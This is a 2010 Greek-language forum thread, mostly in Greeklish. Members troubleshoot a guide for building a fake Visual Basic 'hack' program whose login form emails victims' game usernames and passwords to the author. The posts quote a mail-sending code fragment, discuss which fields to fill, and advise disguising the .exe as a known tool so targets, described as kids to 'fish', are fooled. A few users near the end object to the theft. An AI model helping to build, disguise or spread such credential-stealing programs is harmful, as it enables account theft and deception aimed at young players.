stoukas Posted August 9, 2010 Posted August 9, 2010 des to prwigoumeno post m kai pes m pos na to fix...episis pio apo ta 2 box me script pou exei na paro? auto to prwto h tou STEALTH P leei Quote
ĐãکøЙє™ Posted August 9, 2010 Posted August 9, 2010 kita 8a paris auto pou exi to e.mail pou prepi na valis kai 8a to topo8etisis sto koubi pou 8es gia na litoubgi P.x Long In kai 8a tous to serviris san hack kai oti prepi na valoun to acc tous kai na patisoun long in ! Quote
stoukas Posted August 9, 2010 Posted August 9, 2010 exeis teamviewer h msn? yay lol...evgaze error gt eixa la8os to pass douleuei tora :P Quote
stoukas Posted August 9, 2010 Posted August 9, 2010 yay lol...evgaze error gt eixa la8os to pass douleuei tora :P Quote
Salot Posted August 10, 2010 Author Posted August 10, 2010 Na rotiso alaksa version kai exi to tollbox alla thelo na rotiso otan les patame sto log kai bgeni to code to kanoume delete kai pername afto poules copypaste i apo kato tou edit kai edo ti bazo sta username mail.Subject = "Username: " & TextBox1.Text mail.Body = "Username : " & TextBox1.Text & " edit to eftiaksa alla den lei re c se piona server pao nabo kai sta pedia username ti bazo stoukas MIN TO KANETE PROGRAM DEN THA BALI TA MONEY Sto username den vazeis tpt... Episis re eleos hremiste :| an to ftiaksete etsi opws akrivws lew 8a sas petixei,.... episis otan paw Athina me to kalo 8a to kanw kai se video . Quote
ĐãکøЙє™ Posted August 10, 2010 Posted August 10, 2010 Sto username den vazeis tpt... Episis re eleos hremiste :| an to ftiaksete etsi opws akrivws lew 8a sas petixei,.... episis otan paw Athina me to kalo 8a to kanw kai se video . kalitera se video gt ligi nio8oun gia na to ftiaksoun etC h ali dn travane :) Quote
darklegendary Posted August 11, 2010 Posted August 11, 2010 re si to textbox den m to dixni sta tools :/ Quote
kostic Posted August 15, 2010 Posted August 15, 2010 re si na rwtisw kati dn 3erw an rwtise kanis alos ala ayto otan les na t stiloume dld 9a t poume e exw ena prog sto stelnw ke kane log in apo eki? dld me ti profash 9a tou to stiloume gt nta3 o kosmos dn ine k xazos na t stilis ela prog k aytos n to ani3i an dn tou e3igishs tcpa t prog fenete gamato k aporw pws t skeftikes :) 1 last thing otan les na tou to stiloume enwis mono to windowsapplication1.exe swsta i ke tpt alo? Quote
Salot Posted August 16, 2010 Author Posted August 16, 2010 Mono to .exe alla boreis na to ftiakseis san to phx na fenete wste na tsibaei kalitera o allos. Quote
Slade Posted August 17, 2010 Posted August 17, 2010 Ωραίο το guide σου φιλε μου. Ορίστε και τι έφτιαξα : Quote
ĐãکøЙє™ Posted August 17, 2010 Posted August 17, 2010 Ωραίο το guide σου φιλε μου. Ορίστε και τι έφτιαξα : re trele ok piC kai etC ala to 8ema ine na ftiaxnis kati po na miazi me program gia na psaronis pedia auto pou ekanes eCi ine san panel tou Lineage Quote
Slade Posted August 17, 2010 Posted August 17, 2010 re trele ok piC kai etC ala to 8ema ine na ftiaxnis kati po na miazi me program gia na psaronis pedia auto pou ekanes eCi ine san panel tou Lineage Δηλαδή θες να πεις ότι θα καταφέρεις να κλέψεις έτσι ? Quote
vedetta Posted August 18, 2010 Posted August 18, 2010 giati se afti tin xora theloume apo mikra pedia na klevoume? Quote
Recommended Posts